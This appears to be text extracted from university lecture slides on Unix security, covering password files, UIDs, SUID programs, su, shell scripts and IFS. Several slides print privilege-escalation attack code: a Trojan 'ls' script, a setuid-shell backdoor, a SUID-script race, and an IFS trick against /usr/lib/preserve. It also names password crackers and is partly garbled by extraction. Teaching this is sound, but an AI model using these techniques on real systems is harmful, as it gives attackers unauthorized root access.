The Attack and Defense of Computers

1

• The Attack and Defense of Computers
• Dr. ? ? ?

2

• Passwords in Unix/Linux Systems

3
/etc/passwd

• Format
• Racehl eH5/.mj7NB3dx181100Rachel
  Cohen/u/rachelbin/ksh

home directory
uid
gid
user name
login shell
account name
encrpyted password
4
System Function Account

• Unix opens special accounts for a variety of
  system functions. (e.g. daemon/sys, ftp, nobody,
  uucp)
• daemon11 /tmp
• ftp33FTP User/usr/sool/ftp
• nobody6000160001/tmp
• uucp44/usr/spool/uucppublic/us/lib/uucp/uuc
  ico

Prevent users from using login to log into the
system. (not include trusted host/user rlogin)
5
Password Crackers

• Download (1)
• Download (2)
• John the Ripper password cracker -- Linux
• Ophcrack 2 -- Windows

6
One Time Password

• Password list
• Small Card
• Calculator

7

• UID, GID, and SUID

8
Account Name and UID

• UID 0 ? root.
• A system identifies a user by her/his UID, not
  her/his name.
• e.g. Name root, UID 100 ? no root privilege
• Name doggy, UID 0 ? root privilege.
• good habit user name root should be
  preserved for system administrators.
• Users with different user names but with the same
  UID are treated as the same user by the system.

9
Real UIDs and Effective UIDs

• A Unix process has at least these two IDs
• Real UID
• a process owners real identity
• and
• matches up with the username the owner logged in
  as.
• Effective UID
• a system decide a processs privilege based on
  this ID.
• Usually, the above two IDs of a process are the
  same.

10
setuid or SUID program

• When a suid program is run, the process involved
  takes on an efficient UID that is the same as the
  owner of the file, but the real UID remains the
  same as the one of the user that creates the
  process.
• chmod 4xxx filename
• e.g.
• chmod 4757 program_name
• ls al
• ..
• -rwsr-xrwx root user 16384 Sep 3 2005
  program_name

suid program indicator
11
setuid Program examples

• su
• passwd

12
Group

• Each user belongs to a primary group that is
  stored in the /etc/passwd file.
• The /etc/group file contains every group and its
  gid in a system.
• vision101Keith,arlin,janice
• users100
• startrek102janice,karen,arlin
• Each user can belong to several different groups,
  but her/his gid can be the gid of only one of the
  groups which she/he belongs to.
• A user can use command newgrp to change her/his
  gid.

13
su Substitute User

• whoami
• tim
• su john
• Password
• whomai
• john
• su
• Password
• whoami
• root

super user password
new prompt
14
Security Problem with su

• Type /bin/su -

cause the sub-shell to read all relevant startup
files and simulate a login therefore, the new
shell uses the roots environment variable,
including PATH.
1) avoid Trojan horse (another program with the
same name and in one of the directories listed
in the PATH variable.) 2) The access right of the
directory that contains the Trojan may not be set
correctly.
15
Stealing Superuser Account

• Assume the roots PATH variable is as follows
  .xxxxxxx
• Observation When going into a directory, the
  first command a user types usually is ls.
• cat ls
• ! /bin/sh
• cp /bin/sh ./stuff/junk/.superdude
• chmod 4555 ./stuff/junk/.superdude
• rm f 0
• exec /bin/ls 1_at_
• cd
• chmod 700 .
• touch ./-f

A Trojan horse shell script with name ls.
1) Change the access right of the users home
directory so that the victim must use root
account to see the content of this directory. 2)
Create a file named -f
16
Account Steal by Passersby

• cp /bin/sh /tmp/break-acct
• chmod 4755 /tmp/break-acct

When a user left her/his terminal unnoticed, then
a bystander could create a backdoor easily by
just typing the above commands.
17

• Shells and Shell Scripts

18
Shell

• Also called a command line interpreter.
• When you login a system, it
• displays a prompt on the screen
• and
• waits for you to enter a commend.
• A running shell is also a process.
• Some of the famous shells
• Bourne shell (/bin/sh)
• Bourne Again shell (/bin/bash)
• Korn Shell (/bin/ksh)
• C-shell (/bin/csh)

19
Shell Script

• A shell script is series of commands written in
  plain text file.
• In order to make a shell script executable, its
  file permission must be changed to executable.
• Usually the first line of a shell script is as
  follows
• ! Shell
• , then followed by a series of commands

20
Security Problems of SUID Shell Script

• Two shells are involved in the execution of a
  shell script.
• The shell that accepts the shell script command.
• The shell that executes the shell script.
• Race Conditon
• cd /tmp
• ln /etc/setid_script temp
• nice -20 temp
• mv my_script temp

Between the time the kernel opens the file to see
which interpreter to run, and when the
(now-set-id) interpreter turns around and reopens
the file to interpret it, an attacker might
change the file (directly or via symbolic links).

• opened twice
• by kernel
• by executing shell

attack script
21
Solution

• /dev/fd
• When the kernel passes the name of the set-id
  script to open to the interpreter, rather than
  using a pathname (which would permit the race
  condition) it instead passes the filename
  /dev/fd/3.

22

• IFS Security

23
IFS Environment Variable

• The IFS specifies which characters separate
  commands.
• It is normally set to a space, tab, or new line.

24
IFS and Shell Script Security

• By changing the IFS, a hacker can change what
  programs our script executes.
• Our script calls the /usr/bin/passwd program.
• Changing the IFS to "/" with
• export IFS'/'
• causes the script to no longer run
  /usr/bin/passwd, but instead run usr bin passwd.
• Now a hacker can create a script called usr that
  generates a root shell.

25
Security Hole in /usr/lib/preserve
vi
3. preserve saves the edited file in a restricted
area
1.telnet
2. disconnect
4. recover program reads the file from the area
26
/usr/lib/preserve and /bin/mail

• preserve was installed SUID root.
• preserve ran /bin/mail as the root user to alert
  users that their files had been preserved.
• preserve executed the mail program with the
  system() function call.

According to the content of IFS to parse a string
into command, options, and arguments
27
Change IFS to Execute a Different Program/Script

• If IFS/, then preserve will execute, bin mail
  instead of /bin/mail.

cat bin ! /bin/sh cd /home/mydir/bin cp
/bn/sh ./sh chown root sh chmod 4755 sh